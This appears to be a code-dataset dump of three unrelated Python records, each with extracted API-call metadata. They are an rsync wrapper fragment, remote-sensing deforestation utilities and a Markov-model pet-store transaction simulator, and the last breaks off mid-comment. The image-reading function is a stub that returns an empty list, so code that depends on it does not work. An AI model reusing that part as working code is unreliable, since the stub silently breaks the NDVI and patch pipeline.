command = subprocess.Popen(["rsync"] + options + [from_path, to_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1)
if "v" in options:
while True:
line = command.stdout.readline()
if line != '':
print (line.rstrip())
else:
break
err = command.stderr.read().strip()
if err:
msg = "rsync received messages on stderr. This might indicate that the command failed or, if you transferred to a remote server," \
" it might just be some message received by the remote server. \n" \
"This is because rsync automatically forwards all messages by the remote server to stderr. \n" \
"If you are confident that the call succeeded although stderr received messages, then catch the RuntimeError accordingly.\n " \
"The messages received are: \n %s" % err
raise RuntimeError(msg)
print("rsync finished")
return True
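# Usage sketch (added for illustration; paths and address are hypothetical):
#
#   simple_rsync("~/experiments/", "remote_experiments", "192.168.0.10", verbose=True)
#
# runs: rsync -ahv <expanded local path> <username>@192.168.0.10:~/remote_experiments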
|
[
"subprocess.Popen",
"artemis.remote.utils.get_ssh_connection",
"artemis.config.get_artemis_config_value",
"os.path.isfile",
"os.path.expanduser"
] |
[((666, 704), 'os.path.expanduser', 'os.path.expanduser', (["('~/%s' % file_path)"], {}), "('~/%s' % file_path)\n", (684, 704), False, 'import os\n'), ((2841, 2902), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""python"""'}), "(section=ip_address, option='python')\n", (2865, 2902), False, 'from artemis.config import get_artemis_config_value\n'), ((3019, 3049), 'artemis.remote.utils.get_ssh_connection', 'get_ssh_connection', (['ip_address'], {}), '(ip_address)\n', (3037, 3049), False, 'from artemis.remote.utils import get_ssh_connection\n'), ((4211, 4241), 'os.path.expanduser', 'os.path.expanduser', (['local_path'], {}), '(local_path)\n', (4229, 4241), False, 'import os\n'), ((4257, 4320), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""username"""'}), "(section=ip_address, option='username')\n", (4281, 4320), False, 'from artemis.config import get_artemis_config_value\n'), ((5008, 5132), 'subprocess.Popen', 'subprocess.Popen', (["(['rsync'] + options + [from_path, to_path])"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'bufsize': '(1)'}), "(['rsync'] + options + [from_path, to_path], stdout=\n subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1)\n", (5024, 5132), False, 'import subprocess\n'), ((1228, 1294), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""private_key"""'}), "(section=ip_address, option='private_key')\n", (1252, 1294), False, 'from artemis.config import get_artemis_config_value\n'), ((1309, 1341), 'os.path.isfile', 'os.path.isfile', (['private_key_path'], {}), '(private_key_path)\n', (1323, 1341), False, 'import os\n'), ((1576, 1606), 'artemis.remote.utils.get_ssh_connection', 'get_ssh_connection', (['ip_address'], {}), '(ip_address)\n', (1594, 1606), False, 'from artemis.remote.utils import get_ssh_connection\n'), ((765, 824), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': 'option'}), '(section=ip_address, option=option)\n', (789, 824), False, 'from artemis.config import get_artemis_config_value\n'), ((2197, 2263), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""private_key"""'}), "(section=ip_address, option='private_key')\n", (2221, 2263), False, 'from artemis.config import get_artemis_config_value\n'), ((2511, 2534), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2529, 2534), False, 'import os\n'), ((2026, 2089), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""username"""'}), "(section=ip_address, option='username')\n", (2050, 2089), False, 'from artemis.config import get_artemis_config_value\n')]
|
import os
import numpy as np
import scipy.io as sio
import skimage as sk
#from osgeo import gdal
from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix
import sklearn
import warnings
import matplotlib.pyplot as plt  # needed by plot_embedding below
def save_as_mat(data, name):
sio.savemat(name, {name: data})
def Read_TIFF_Image(Path):
img =[]
#gdal_header = gdal.Open(Path)
#img = gdal_header.ReadAsArray()
return img
def Compute_NDVI_Band(Image):
Image = Image.astype(np.float32)
nir_band = Image[4, :, :]
red_band = Image[3, :, :]
ndvi = np.zeros((Image.shape[1] , Image.shape[2] , 1))
ndvi[ : , : , 0] = np.divide((nir_band-red_band),(nir_band+red_band))
return ndvi
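# Worked example (added for illustration): for a pixel with NIR = 0.6 and
# Red = 0.2, NDVI = (0.6 - 0.2) / (0.6 + 0.2) = 0.5.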
def compute_metrics(true_labels, predicted_labels):
conf_mat = confusion_matrix(true_labels, predicted_labels)
accuracy = 100*accuracy_score(true_labels, predicted_labels)
with warnings.catch_warnings():
warnings.filterwarnings("error")
try:
precision = 100*precision_score(true_labels, predicted_labels)
except Warning as e:
if isinstance(e, sklearn.exceptions.UndefinedMetricWarning): precision = np.nan
else: raise e
try:
recall = 100*recall_score(true_labels, predicted_labels)
except Warning as e:
if isinstance(e, sklearn.exceptions.UndefinedMetricWarning): recall = np.nan
else: raise e
try:
f1score = 100*f1_score(true_labels, predicted_labels)
except Warning as e:
if isinstance(e, sklearn.exceptions.UndefinedMetricWarning): f1score = np.nan
else: raise e
return accuracy, f1score, recall, precision, conf_mat
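# Usage sketch (added for illustration) with toy labels:
#   acc, f1, rec, prec, cm = compute_metrics([0, 1, 1, 0], [0, 1, 0, 0])
# gives accuracy 75.0, f1 ~66.67, recall 50.0 and precision 100.0; any metric
# whose denominator is zero is returned as np.nan instead of raising.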
def Data_Augmentation_Definition(corners_coordinates):
num_sample = np.size(corners_coordinates , 0)
data_cols = np.size(corners_coordinates , 1)
corners_coordinates_augmented = np.zeros((3 * num_sample, data_cols + 1))
counter = 0
for s in range(num_sample):
corners_coordinates_0 = corners_coordinates[s]
# central_pixels_coor_augmented[counter, 0 : 2] = central_pixels_coor_x_0
# central_pixels_coor_augmented[counter, 2] = 0
# labels_augmented[counter, :] = labels_y_0
# counter += 1
corners_coordinates_augmented[counter, 0 : 4] = corners_coordinates_0
corners_coordinates_augmented[counter, 4] = 1
counter += 1
corners_coordinates_augmented[counter, 0 : 4] = corners_coordinates_0
corners_coordinates_augmented[counter, 4] = 2
counter += 1
corners_coordinates_augmented[counter, 0 : 4] = corners_coordinates_0
corners_coordinates_augmented[counter, 4] = 3
counter += 1
return corners_coordinates_augmented
def Data_Augmentation_Execution(data, transformation_indexs):
data_rows = np.size(data , 1)
data_cols = np.size(data , 2)
data_depth = np.size(data , 3)
num_sample = np.size(data , 0)
data_transformed = np.zeros((num_sample, data_rows, data_cols, data_depth))
counter = 0
for s in range(num_sample):
data_x_0 = data[s, :, :, :]
transformation_index = transformation_indexs[s]
#Rotating
if transformation_index == 0:
data_transformed[s, :, :, :] = data_x_0
if transformation_index == 1:
data_transformed[s, :, :, :] = np.rot90(data_x_0)
if transformation_index == 2:
data_transformed[s, :, :, :] = np.flip(data_x_0, 0)
if transformation_index == 3:
data_transformed[s, :, :, :] = np.flip(data_x_0, 1)
return data_transformed
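# Note: Data_Augmentation_Definition emits three copies of every corner tuple
# tagged with transformation indices 1 (rot90), 2 (vertical flip) and
# 3 (horizontal flip); Data_Augmentation_Execution then applies the matching
# transform to each patch.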
def Patch_Extraction(data, corners_coordinates, patch_size):
data_depth = np.size(data, 2)
num_samp = np.size(corners_coordinates , 0)
patches_cointainer = np.zeros((num_samp, patch_size, patch_size, data_depth))
for i in range(num_samp):
patches_cointainer[i, :, :, :] = data[int(corners_coordinates[i , 0]) : int(corners_coordinates[i , 2]) , int(corners_coordinates[i , 1]) : int(corners_coordinates[i , 3]) , :]
return patches_cointainer
def mask_creation(mask_row, mask_col, num_patch_row, num_patch_col, Train_tiles, Valid_tiles, Undesired_tiles):
train_index = 1
teste_index = 2
valid_index = 3
undesired_index = 4
patch_dim_row = mask_row//num_patch_row
patch_dim_col = mask_col//num_patch_col
mask_array = 2 * np.ones((mask_row, mask_col))
train_mask = np.ones((patch_dim_row, patch_dim_col))
valid_mask = 3 * np.ones((patch_dim_row, patch_dim_col))
undesired_mask = 4 * np.ones((patch_dim_row, patch_dim_col))
counter_r = 1
counter = 1
for i in range(0, mask_row, patch_dim_row):
for j in range(0 , mask_col, patch_dim_col):
train = np.size(np.where(Train_tiles == counter),1)
valid = np.size(np.where(Valid_tiles == counter),1)
undesired = np.size(np.where(Undesired_tiles == counter), 1)
if train == 1:
mask_array[i : i + patch_dim_row, j : j + patch_dim_col] = train_mask
if counter_r == num_patch_row:
mask_array[i : mask_row, j : j + patch_dim_col] = np.ones((mask_row - i, patch_dim_col))
if valid == 1:
mask_array[i : i + patch_dim_row, j : j + patch_dim_col] = valid_mask
if counter_r == num_patch_row:
mask_array[i : mask_row, j : j + patch_dim_col] = 3 * np.ones((mask_row - i, patch_dim_col))
if undesired == 1:
mask_array[i : i + patch_dim_row, j : j + patch_dim_col] = undesired_mask
if counter_r == num_patch_row:
mask_array[i : mask_row, j : j + patch_dim_col] = 4 * np.ones((mask_row - i, patch_dim_col))
counter += 1
counter_r += 1
return mask_array
def Corner_Coordinates_Definition_Training(mask, last_reference, actual_reference, patch_dimension,
overlap_percent, percent_of_positive_pixels_in_actual_reference):
mask_rows = np.size(mask, 0)
mask_cols = np.size(mask, 1)
# Correcting the references for convenience
last_reference[actual_reference == 2] = 1
actual_reference[actual_reference == 2] = 0
# Computing the overlaps and other things to extract patches
overlap = round(patch_dimension * overlap_percent)
overlap -= overlap % 2
stride = patch_dimension - overlap
step_row = (stride - mask_rows % stride) % stride
step_col = (stride - mask_cols % stride) % stride
k1, k2 = (mask_rows + step_row)//stride, (mask_cols + step_col)//stride
#Taking the initial coordinates
coordinates = np.zeros((k1 * k2 , 4))
counter = 0
for i in range(k1):
for j in range(k2):
coordinates[counter, 0] = i * stride
coordinates[counter, 1] = j * stride
coordinates[counter, 2] = i * stride + patch_dimension
coordinates[counter, 3] = j * stride + patch_dimension
counter += 1
pad_tuple = ((overlap//2, overlap//2 + step_row) , (overlap//2, overlap//2 + step_col))
# Making the padding procedure
# into the mask
mask_padded = np.pad(mask, pad_tuple, mode='symmetric')
# into the past deforestation reference
last_reference_padded = np.pad(last_reference, pad_tuple, mode='symmetric')
# into the actual deforestation reference
actual_reference_padded = np.pad(actual_reference, pad_tuple, mode='symmetric')
#Initializing the central pixels coordinates containers
corners_coordinates_tr = []
corners_coordinates_vl = []
class_weights = []
pad_tuple = ((overlap//2, overlap//2 + step_row) , (overlap//2, overlap//2 + step_col), (0 , 0))
# Refine the central pixels coordinates
counter_tr = 0
counter_vl = 0
positive_percent_accumulated = 0
for i in range(np.size(coordinates , 0)):
mask_reference_value = mask_padded[int(coordinates[i , 0]) : int(coordinates[i , 2]) , int(coordinates[i , 1]) : int(coordinates[i , 3])]
last_reference_value = last_reference_padded[int(coordinates[i , 0]) : int(coordinates[i , 2]) , int(coordinates[i , 1]) : int(coordinates[i , 3])]
actual_reference_value = actual_reference_padded[int(coordinates[i , 0]) : int(coordinates[i , 2]) , int(coordinates[i , 1]) : int(coordinates[i , 3])]
# Looking for a test pixels in the mask reference
test_pixels_indexs = np.transpose(np.array(np.where(mask_reference_value == 2)))
if np.size(test_pixels_indexs,0) == 0:
number_positives_actual_reference = np.sum(actual_reference_value)
percent_of_positive_pixels_in_actual_reference_i = (number_positives_actual_reference/(patch_dimension * patch_dimension)) * 100
if percent_of_positive_pixels_in_actual_reference_i > percent_of_positive_pixels_in_actual_reference:
positive_percent_accumulated += percent_of_positive_pixels_in_actual_reference_i
train_pixels_indexs = np.transpose(np.array(np.where(mask_reference_value == 1)))
percent_of_training_pixels = (train_pixels_indexs.shape[0]/(patch_dimension * patch_dimension)) * 100
if percent_of_training_pixels > 70:
corners_coordinates_tr.append(coordinates[i , :])
counter_tr += 1
if percent_of_positive_pixels_in_actual_reference_i > 3:
valid_pixels_indexs = np.transpose(np.array(np.where(mask_reference_value == 3)))
percent_of_validation_pixels = (valid_pixels_indexs.shape[0]/(patch_dimension * patch_dimension)) * 100
if percent_of_validation_pixels > 70:
corners_coordinates_vl.append(coordinates[i , :])
mean_positive_percent = positive_percent_accumulated/counter_tr
class_weights.append(mean_positive_percent/100)
class_weights.append(1 - (mean_positive_percent/100))
return corners_coordinates_tr, corners_coordinates_vl, last_reference_padded, actual_reference_padded, pad_tuple, class_weights
def Corner_Coordinates_Definition_Testing(mask, patch_dimension, overlap_percent):
mask_rows = np.size(mask, 0)
mask_cols = np.size(mask, 1)
# Computing the overlaps and other things to extract patches
overlap = round(patch_dimension * overlap_percent)
overlap -= overlap % 2
stride = patch_dimension - overlap
step_row = (stride - mask_rows % stride) % stride
step_col = (stride - mask_cols % stride) % stride
k1, k2 = (mask_rows + step_row)//stride, (mask_cols + step_col)//stride
#Taking the initial coordinates
coordinates = np.zeros((k1 * k2 , 4))
counter = 0
for i in range(k1):
for j in range(k2):
coordinates[counter, 0] = i * stride
coordinates[counter, 1] = j * stride
coordinates[counter, 2] = i * stride + patch_dimension
coordinates[counter, 3] = j * stride + patch_dimension
counter += 1
pad_tuple = ((overlap//2, overlap//2 + step_row) , (overlap//2, overlap//2 + step_col), (0 , 0))
return coordinates, pad_tuple, k1, k2, step_row, step_col, stride, overlap
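# Worked example (added for illustration): a 100x100 mask with
# patch_dimension=64 and overlap_percent=0.5 gives overlap=32, stride=32,
# step_row=step_col=28 and a k1 x k2 = 4 x 4 grid of patch corners.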
def Classification_Maps(Predicted_labels, True_labels, central_pixels_coordinates, hit_map):
Classification_Map = np.zeros((hit_map.shape[0], hit_map.shape[1], 3))
TP_counter = 0
FP_counter = 0
for i in range(central_pixels_coordinates.shape[0]):
T_label = True_labels[i]
P_label = Predicted_labels[i]
if T_label == 1:
if P_label == T_label:
TP_counter += 1
#True positve
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 0
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 0
else:
#False Negative
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 0
if T_label == 0:
if P_label == T_label:
#True Negative
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 255
else:
#False Positive
FP_counter += 1
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 0
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 0
return Classification_Map, TP_counter, FP_counter
def plot_embedding(X, y, d, title=None):
"""Plot an embedding X with the class label y colored by the domain d."""
x_min, x_max = np.min(X, 0), np.max(X, 0)
X = (X - x_min) / (x_max - x_min)
# Plot colors numbers
plt.figure(figsize=(10,10))
ax = plt.subplot(111)
for i in range(X.shape[0]):
# plot colored number
plt.text(X[i, 0], X[i, 1], str(y[i]),
color=plt.cm.bwr(d[i] / 1.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([]), plt.yticks([])
if title is not None:
plt.title(title)
|
[
"numpy.sum",
"sklearn.metrics.accuracy_score",
"numpy.ones",
"sklearn.metrics.f1_score",
"numpy.rot90",
"numpy.pad",
"numpy.max",
"warnings.catch_warnings",
"numpy.divide",
"numpy.size",
"sklearn.metrics.recall_score",
"numpy.min",
"numpy.flip",
"warnings.filterwarnings",
"numpy.zeros",
"scipy.io.savemat",
"numpy.where",
"sklearn.metrics.precision_score",
"sklearn.metrics.confusion_matrix"
] |
[((265, 296), 'scipy.io.savemat', 'sio.savemat', (['name', '{name: data}'], {}), '(name, {name: data})\n', (276, 296), True, 'import scipy.io as sio\n'), ((563, 608), 'numpy.zeros', 'np.zeros', (['(Image.shape[1], Image.shape[2], 1)'], {}), '((Image.shape[1], Image.shape[2], 1))\n', (571, 608), True, 'import numpy as np\n'), ((634, 685), 'numpy.divide', 'np.divide', (['(nir_band - red_band)', '(nir_band + red_band)'], {}), '(nir_band - red_band, nir_band + red_band)\n', (643, 685), True, 'import numpy as np\n'), ((769, 816), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (785, 816), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((1775, 1806), 'numpy.size', 'np.size', (['corners_coordinates', '(0)'], {}), '(corners_coordinates, 0)\n', (1782, 1806), True, 'import numpy as np\n'), ((1824, 1855), 'numpy.size', 'np.size', (['corners_coordinates', '(1)'], {}), '(corners_coordinates, 1)\n', (1831, 1855), True, 'import numpy as np\n'), ((1902, 1943), 'numpy.zeros', 'np.zeros', (['(3 * num_sample, data_cols + 1)'], {}), '((3 * num_sample, data_cols + 1))\n', (1910, 1943), True, 'import numpy as np\n'), ((2880, 2896), 'numpy.size', 'np.size', (['data', '(1)'], {}), '(data, 1)\n', (2887, 2896), True, 'import numpy as np\n'), ((2914, 2930), 'numpy.size', 'np.size', (['data', '(2)'], {}), '(data, 2)\n', (2921, 2930), True, 'import numpy as np\n'), ((2949, 2965), 'numpy.size', 'np.size', (['data', '(3)'], {}), '(data, 3)\n', (2956, 2965), True, 'import numpy as np\n'), ((2984, 3000), 'numpy.size', 'np.size', (['data', '(0)'], {}), '(data, 0)\n', (2991, 3000), True, 'import numpy as np\n'), ((3030, 3086), 'numpy.zeros', 'np.zeros', (['(num_sample, data_rows, data_cols, data_depth)'], {}), '((num_sample, data_rows, data_cols, data_depth))\n', (3038, 3086), True, 'import numpy as np\n'), ((3774, 3790), 'numpy.size', 'np.size', (['data', '(2)'], {}), '(data, 2)\n', (3781, 3790), True, 'import numpy as np\n'), ((3806, 3837), 'numpy.size', 'np.size', (['corners_coordinates', '(0)'], {}), '(corners_coordinates, 0)\n', (3813, 3837), True, 'import numpy as np\n'), ((3864, 3920), 'numpy.zeros', 'np.zeros', (['(num_samp, patch_size, patch_size, data_depth)'], {}), '((num_samp, patch_size, patch_size, data_depth))\n', (3872, 3920), True, 'import numpy as np\n'), ((4553, 4592), 'numpy.ones', 'np.ones', (['(patch_dim_row, patch_dim_col)'], {}), '((patch_dim_row, patch_dim_col))\n', (4560, 4592), True, 'import numpy as np\n'), ((6212, 6228), 'numpy.size', 'np.size', (['mask', '(0)'], {}), '(mask, 0)\n', (6219, 6228), True, 'import numpy as np\n'), ((6245, 6261), 'numpy.size', 'np.size', (['mask', '(1)'], {}), '(mask, 1)\n', (6252, 6261), True, 'import numpy as np\n'), ((6843, 6865), 'numpy.zeros', 'np.zeros', (['(k1 * k2, 4)'], {}), '((k1 * k2, 4))\n', (6851, 6865), True, 'import numpy as np\n'), ((7363, 7404), 'numpy.pad', 'np.pad', (['mask', 'pad_tuple'], {'mode': '"""symmetric"""'}), "(mask, pad_tuple, mode='symmetric')\n", (7369, 7404), True, 'import numpy as np\n'), ((7477, 7528), 'numpy.pad', 'np.pad', (['last_reference', 'pad_tuple'], {'mode': '"""symmetric"""'}), "(last_reference, pad_tuple, mode='symmetric')\n", (7483, 7528), True, 'import numpy as np\n'), ((7605, 7658), 'numpy.pad', 'np.pad', (['actual_reference', 'pad_tuple'], {'mode': '"""symmetric"""'}), "(actual_reference, pad_tuple, mode='symmetric')\n", (7611, 7658), True, 'import numpy as np\n'), 
((10385, 10401), 'numpy.size', 'np.size', (['mask', '(0)'], {}), '(mask, 0)\n', (10392, 10401), True, 'import numpy as np\n'), ((10418, 10434), 'numpy.size', 'np.size', (['mask', '(1)'], {}), '(mask, 1)\n', (10425, 10434), True, 'import numpy as np\n'), ((10874, 10896), 'numpy.zeros', 'np.zeros', (['(k1 * k2, 4)'], {}), '((k1 * k2, 4))\n', (10882, 10896), True, 'import numpy as np\n'), ((11541, 11590), 'numpy.zeros', 'np.zeros', (['(hit_map.shape[0], hit_map.shape[1], 3)'], {}), '((hit_map.shape[0], hit_map.shape[1], 3))\n', (11549, 11590), True, 'import numpy as np\n'), ((836, 881), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (850, 881), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((891, 916), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (914, 916), False, 'import warnings\n'), ((926, 958), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""error"""'], {}), "('error')\n", (949, 958), False, 'import warnings\n'), ((4501, 4530), 'numpy.ones', 'np.ones', (['(mask_row, mask_col)'], {}), '((mask_row, mask_col))\n', (4508, 4530), True, 'import numpy as np\n'), ((4614, 4653), 'numpy.ones', 'np.ones', (['(patch_dim_row, patch_dim_col)'], {}), '((patch_dim_row, patch_dim_col))\n', (4621, 4653), True, 'import numpy as np\n'), ((4679, 4718), 'numpy.ones', 'np.ones', (['(patch_dim_row, patch_dim_col)'], {}), '((patch_dim_row, patch_dim_col))\n', (4686, 4718), True, 'import numpy as np\n'), ((8054, 8077), 'numpy.size', 'np.size', (['coordinates', '(0)'], {}), '(coordinates, 0)\n', (8061, 8077), True, 'import numpy as np\n'), ((13777, 13789), 'numpy.min', 'np.min', (['X', '(0)'], {}), '(X, 0)\n', (13783, 13789), True, 'import numpy as np\n'), ((13791, 13803), 'numpy.max', 'np.max', (['X', '(0)'], {}), '(X, 0)\n', (13797, 13803), True, 'import numpy as np\n'), ((3416, 3434), 'numpy.rot90', 'np.rot90', (['data_x_0'], {}), '(data_x_0)\n', (3424, 3434), True, 'import numpy as np\n'), ((3516, 3536), 'numpy.flip', 'np.flip', (['data_x_0', '(0)'], {}), '(data_x_0, 0)\n', (3523, 3536), True, 'import numpy as np\n'), ((3618, 3638), 'numpy.flip', 'np.flip', (['data_x_0', '(1)'], {}), '(data_x_0, 1)\n', (3625, 3638), True, 'import numpy as np\n'), ((8701, 8731), 'numpy.size', 'np.size', (['test_pixels_indexs', '(0)'], {}), '(test_pixels_indexs, 0)\n', (8708, 8731), True, 'import numpy as np\n'), ((8785, 8815), 'numpy.sum', 'np.sum', (['actual_reference_value'], {}), '(actual_reference_value)\n', (8791, 8815), True, 'import numpy as np\n'), ((1000, 1046), 'sklearn.metrics.precision_score', 'precision_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (1015, 1046), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((1232, 1275), 'sklearn.metrics.recall_score', 'recall_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (1244, 1275), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((1459, 1498), 'sklearn.metrics.f1_score', 'f1_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (1467, 1498), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((4894, 4926), 'numpy.where', 'np.where', (['(Train_tiles == counter)'], {}), 
'(Train_tiles == counter)\n', (4902, 4926), True, 'import numpy as np\n'), ((4958, 4990), 'numpy.where', 'np.where', (['(Valid_tiles == counter)'], {}), '(Valid_tiles == counter)\n', (4966, 4990), True, 'import numpy as np\n'), ((5026, 5062), 'numpy.where', 'np.where', (['(Undesired_tiles == counter)'], {}), '(Undesired_tiles == counter)\n', (5034, 5062), True, 'import numpy as np\n'), ((8652, 8687), 'numpy.where', 'np.where', (['(mask_reference_value == 2)'], {}), '(mask_reference_value == 2)\n', (8660, 8687), True, 'import numpy as np\n'), ((5297, 5335), 'numpy.ones', 'np.ones', (['(mask_row - i, patch_dim_col)'], {}), '((mask_row - i, patch_dim_col))\n', (5304, 5335), True, 'import numpy as np\n'), ((5570, 5608), 'numpy.ones', 'np.ones', (['(mask_row - i, patch_dim_col)'], {}), '((mask_row - i, patch_dim_col))\n', (5577, 5608), True, 'import numpy as np\n'), ((5851, 5889), 'numpy.ones', 'np.ones', (['(mask_row - i, patch_dim_col)'], {}), '((mask_row - i, patch_dim_col))\n', (5858, 5889), True, 'import numpy as np\n'), ((9228, 9263), 'numpy.where', 'np.where', (['(mask_reference_value == 1)'], {}), '(mask_reference_value == 1)\n', (9236, 9263), True, 'import numpy as np\n'), ((9680, 9715), 'numpy.where', 'np.where', (['(mask_reference_value == 3)'], {}), '(mask_reference_value == 3)\n', (9688, 9715), True, 'import numpy as np\n')]
|
from collections import defaultdict
import math
import random
import hashlib
from markovmodel import MarkovModelBuilder
from samplers import RouletteWheelSampler
class ItemCategoryMarkovModelBuilder(object):
def __init__(self, item_category=None, customer=None):
self.item_category = item_category
self.customer = customer
def _normalize_field_weights(self):
weight_sum = sum(self.field_weights.itervalues())
for field, weight in list(self.field_weights.iteritems()):
self.field_weights[field] = weight / weight_sum
def _generate_transition_parameters(self):
self.field_weights = dict()
self.field_similarity_weights = dict()
for field in self.item_category.fields:
avg = random.choice([0.15, 0.85])
self.field_weights[field] = min(0.95, max(0.05, random.normalvariate(avg, 0.1)))
avg = random.choice([0.15, 0.85])
self.field_similarity_weights[field] = min(0.95, max(0.05, random.normalvariate(avg, 0.1)))
avg = random.choice([0.25, 0.75])
self.loopback_weight = min(0.95, max(0.05, random.normalvariate(avg, 0.1)))
def similarity_weight(self, rec1, rec2):
weight = 0.0
for field in self.item_category.fields:
if rec1[field] == rec2[field]:
weight += self.field_weights[field] * self.field_similarity_weights[field]
else:
weight += self.field_weights[field] * (1.0 - self.field_similarity_weights[field])
return weight
def create_markov_model(self):
self._generate_transition_parameters()
self._normalize_field_weights()
builder = MarkovModelBuilder()
for rec in self.item_category.items:
builder.add_state(tuple(rec.items()))
weight_sum = 0.0
for other_rec in self.item_category.items:
if rec != other_rec:
weight_sum += self.similarity_weight(rec, other_rec)
for other_rec in self.item_category.items:
weight = 0.0
if rec != other_rec:
weight = (1.0 - self.loopback_weight) * self.similarity_weight(rec, other_rec) / weight_sum
else:
weight = self.loopback_weight
builder.add_edge_weight(tuple(rec.items()), tuple(other_rec.items()), weight)
return builder.build_msm()
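# Note: each item keeps self-transition probability loopback_weight; the
# remaining (1 - loopback_weight) mass is spread over the other items in
# proportion to similarity_weight, so every row of the transition matrix
# sums to 1.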
class Transaction(object):
def __init__(self, customer=None, trans_time=None, purchased_items=None, store=None,
trans_count=None):
self.store = store
self.customer = customer
self.trans_time = trans_time
self.purchased_items = purchased_items
self.trans_count = trans_count
def transaction_id(self):
return hashlib.md5(repr(self)).hexdigest()
def __repr__(self):
return "(%s, %s, %s, %s)" % (self.store.id,
self.customer.id,
self.trans_time,
self.trans_count)
class TransactionPurchasesSimulator(object):
def __init__(self, customer_state=None, item_categories=None):
self.customer_state = customer_state
self.item_purchases_msms = dict()
for category_label, category_data in item_categories.iteritems():
num_pets = 0
for species in category_data.species:
num_pets += customer_state.customer.pets[species]
if num_pets > 0:
builder = ItemCategoryMarkovModelBuilder(item_category=category_data,
customer=customer_state.customer)
self.item_purchases_msms[category_label] = builder.create_markov_model()
def choose_category(self, trans_time=None, num_purchases=None):
category_weights = self.customer_state.item_category_weights(trans_time)
if num_purchases != 0:
category_weights.append(("stop", 0.1))
weight_sum = 0.0
for category, weight in category_weights:
weight_sum += weight
category_probabilities = []
for category, weight in category_weights:
category_probabilities.append((category, weight / weight_sum))
sampler = RouletteWheelSampler(category_probabilities)
return sampler.sample()
def choose_item(self, category):
item = self.item_purchases_msms[category].progress_state()
return item
def update_usage_simulations(self, trans_time=None, item=None):
self.customer_state.update_inventory(trans_time, item)
def simulate(self, trans_time=None):
trans_items = []
purchases = 0
while True:
category = self.choose_category(trans_time=trans_time,
num_purchases=purchases)
if category == "stop":
break
item = self.choose_item(category)
self.update_usage_simulations(trans_time=trans_time,
item=item)
purchases += 1
trans_items.append(item)
return trans_items
class TransactionTimeSampler(object):
def __init__(self, customer_state=None):
self.customer_state = customer_state
def propose_transaction_time(self):
return self.customer_state.propose_transaction_time()
def transaction_time_probability(self, proposed_trans_time, last_trans_time):
if proposed_trans_time >= last_trans_time:
return 1.0
else:
return 0.0
def sample(self, last_trans_time):
while True:
proposed_time = self.propose_transaction_time()
prob = self.transaction_time_probability(proposed_time, last_trans_time)
r = random.random()
if r < prob:
return proposed_time
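    # sample() is plain rejection sampling; since the acceptance probability is
    # either 0.0 or 1.0 here, it simply re-proposes until a time at or after
    # last_trans_time comes up, keeping transaction times monotonically
    # increasing.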
class TransactionSimulator(object):
def __init__(self, stores=None, customer_state=None, item_categories=None):
self.stores = stores
self.customer_state = customer_state
self.trans_time_sampler = TransactionTimeSampler(customer_state=customer_state)
self.purchase_sim = TransactionPurchasesSimulator(customer_state=self.customer_state, item_categories=item_categories)
self.trans_count = 0
def simulate(self, end_time):
last_trans_time = 0.0
while True:
trans_time = self.trans_time_sampler.sample(last_trans_time)
if trans_time > end_time:
break
purchased_items = self.purchase_sim.simulate(trans_time=trans_time)
trans = Transaction(customer=self.customer_state.customer,
purchased_items=purchased_items,
trans_time=trans_time,
trans_count=self.trans_count,
store=random.choice(self.stores))
self.trans_count += 1
last_trans_time = trans_time
yield trans
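# Sketch of intended use (illustrative only; `stores`, `customer_state` and
# `item_categories` are assumed to be constructed elsewhere):
#   sim = TransactionSimulator(stores=stores,
#                              customer_state=customer_state,
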